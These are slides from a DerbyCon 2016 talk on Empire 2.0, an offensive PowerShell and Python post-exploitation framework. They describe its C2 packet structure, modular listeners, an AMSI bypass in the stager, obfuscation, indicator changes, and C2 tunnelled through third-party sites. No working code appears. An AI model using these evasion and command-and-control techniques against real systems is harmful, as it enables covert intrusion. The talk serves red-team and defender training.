This presentation was given at DerbyCon 6 on 9/23/2016. It covers the fusion of the PowerShell Empire and Python EmPyre projects, as well as new Empire 2.0 transports.
2. First Things First
✣ Empire would not be possible without the
help and phenomenal work from:
PowerSploit by @mattifestation, @obscuresec
and @JosephBialek
Posh-SecMod by @Carlos_Perez
UnmanagedPowerShell by @tifkin_
Mimikatz by @gentilkiwi and Vincent LE
TOUX
✣ Everyone who contributed modules, bugs,
fixes, and time! You all rock!
3. Co-founder of Empire/EmPyre | PowerTools |
Veil-Framework
PowerSploit/BloodHound developer
Microsoft PowerShell MVP
@harmj0y
4. Red teamer and Empire developer
UAC bypasser extraordinaire
Offensive PowerShell advocate
@enigma0x3
5. tl;dr
✣ Empire overview
✣ Empire 2.0
Motivations
New features
EmPyre integration
‘Modular’ listeners
✣ Demos
7. ✣ A full-featured PowerShell
post-exploitation agent
Released at BSides LV ‘15
✣ Core agent built in PowerShell
Module structure implements various
post-exploitation actions
✣ Controller built in Python
Backend sqlite database
UI focus
Teh Empire
8. ✣ Started as a thought exercise!
✣ Wanted to:
bring together all the existing offensive
PowerShell tech
build a flexible platform that’s easily
customizable in the field
train defenders on how to stop and
respond to PowerShell “attacks”
y u Build PowerShell
Botnet :(
18. New Features Since
Release
✣ From 90 modules to 180!
Inveigh/Tater!
regsrv32!
MS16-032!
More TrollSploit!
KeeThief!
Lots of UAC bypasses!
Tons more!
✣ A RESTful API interface
✣ Autoruns, lost limits, and more.
19. Python EmPyre
✣ A Python Empire variant built for a
customer’s heavy OS X environment
Python 2.6/2.7 compatible agent
Works on Linux too!
✣ Controller/architecture HEAVILY
adopted from Empire
✣ Released publicly at HackMiami
Presented on at BSides LV ‘16
20. Empire Drawbacks
✣ We’ve never built a RAT before
Mistakes were made ¯_(ツ)_/¯
✣ Only comms methods were HTTP[S]
Modules were expandable, transports
weren’t
✣ Separate projects for Empire/EmPyre
Name/project confusion
Separate codebases ==
22. Motivations
Empire/EmPyre
Integration
Wanted one single
controller for our
Python Linux/OS
X agents and
PowerShell agents.
Modularize C2
Expandable
listeners that you
can drag/drop into
the framework for
additional
transports.
Code Rot
Fix our past
mistakes and build
a foundation for
the future viability
of the project.
23. Laying the
Foundation
✣ For future transports, agents may
need to be able figure out where to
route packets for other agents
✣ All Empire comms are not wrapped in
‘routing’ packets encrypted w/ the
staging key
✣ All individual agent comms still use
the negotiated agent key
24. New Routing/Metadata Packet:
+---------+-------------------+--------------------------+
| RC4 IV | RC4s(RoutingData) | AESc(client packet data) |
+---------+-------------------+--------------------------+
| 4 | 16 | RC4 length |
+---------+-------------------+--------------------------+
RC4s(RoutingData):
+-----------+------+------+-------+--------+
| SessionID | Lang | Meta | Extra | Length |
+-----------+------+------+-------+--------+
| 8 | 1 | 1 | 2 | 4 |
+-----------+------+------+-------+--------+
RC4s = RC4 w/ the shared
staging key
HMACs = SHA1 HMAC w/
shared staging
AESc = AES w/ client's
session key
HMACc = first 10 bytes of a
SHA256 HMAC using the
client's session key
25. AESc(client data)
+--------+-----------------+-------+
| AES IV | Enc Packet Data | HMACc |
+--------+-----------------+-------+
| 16 | % 16 bytes | 10 |
+--------+-----------------+-------+
Client data decrypted:
+------+--------+--------------------+----------+---------+-----------+
| Type | Length | total # of packets | packet # | task ID | task data |
+------+--------+--------------------+--------------------+-----------+
| 2 | 4 | 2 | 2 | 2 | <Length> |
+------+--------+--------------------+----------+---------+-----------+
RC4s = RC4 w/ the shared staging key
HMACs = SHA1 HMAC w/ shared staging
AESc = AES w/ client's session key
HMACc = first 10 bytes of a SHA256 HMAC
using the client's session key
26. Newz
✣ The HTTP listener has been redone
with Flask
✣ Epoch-syncing removed
✣ PowerShell:
Staging now uses HMAC and nonces
RC4 implemented for first stage
PowerShell obfuscation
@mattifestation’s AMSI bypass added to
the PowerShell stager
27. Newz
✣ Orphaned agent renegotiation
If agent shares a server staging key, but
isn’t in the cache, it will restage
✣ external/* modules
For things that don’t rely on an agent
external/generate_agent will generate a
“fully-staged” agent
33. EmPyre Integration
✣ EmPyre and Empire are now one code
base!
https://github.com/AdaptiveThreat/Empire
The EmPyre repo will be deprecated
Python/PowerShell agents can
communicate on the same listener/port!
✣ We also now have a 5 person “full-time”
dev team:
@harmj0y, @enigma0x3, @424f424f,
@xorrior, @tifkin_
36. interact AGENT
Drops you into the
language-appropri
ate agent menu
with the same
options you’re
used to for either
project.
Interface Integration
stagers/*
Now broken out
into OS-applicable
folders
(Windows/OS
X/Linux).
usemodule [tab]
Executed from an
agent, only
tab-completes
language-appropri
ate modules.
38. Listener
Modularization
✣ Previously, listeners were hard
integrated into the code base, adding
transports was extremely difficult
✣ Now listeners are encapsulated in
self-contained modules
Allows you to drag/drop modules into the
framework!
39. Listener Modules
✣ At least two functions are required for a
listener module:
generate_comms() - generates the
communication functions patched for the
given listener
start() - starts the server component of the
listener
✣ Agents are responsible for language
support
40. Listener Modules
✣ If you want staging supported:
generate_launcher() - generates
PowerShell/Python launcher code
generate_stager() - generates the
key-negotiation code
generate_agent() - generates the complete
patched agent code
41. listeners/http
✣ The original HTTP[S] listener
But now redone with flask!
“Routing packet” is base64’ed and stuffed
into a new cookie value
✣ Generates Python and PowerShell
launchers, staging, and agent code
✣ You can easily modify the cookie
used/transforms on the data itself to
change up indicators!
42. listeners/http_com
✣ Utilizes Internet Explorer COM
objects to communicate instead of
Net.WebClient
Proxy-aware/etc.!
✣ Slightly different communication
structure (data is base64’ed, etc.)
Example of modifying basic C2 indicators
44. listeners/http_hop
✣ Completely redone “hop” listener
Simpler (with new packet structure) and
should be more stable
✣ Uses a .php redirector to tunnel
comms through a third site
✣ We’re looking for more
lanugage-based redirectors!
.ASP/.JSP/etc.
45. listeners/meterpreter
✣ The only thing present is the
generate_launcher() method
This generates Invoke-ShellCode code
applicable for the given Meterpreter
listener specification
✣ Allows you to easily spawn
Meterpreter/Cobalt Strike sessions
from Empire!
46. ✣ The new structure allows you to
communicate (and possibly stage)
through well-known third party
websites
✣ Let your imagination run with it…
* don’t break any terms of service, we’re not
lawyers
Third Party Listeners
47.
48. Listener Hot-Swapping
✣ The management/switch_listener
module allows you to generate the
comms for a listener, and
dynamically update a running agent
with new comms!
✣ You can switch from HTTP ->
Dropbox -> IE_COM -> Dropbox,
even en masse!
49. Future Listeners
✣ In the next few months:
SMB - just need to work out some of the
routing components
DNS - @enigma0x3 is working as we speak
✣ Ideas?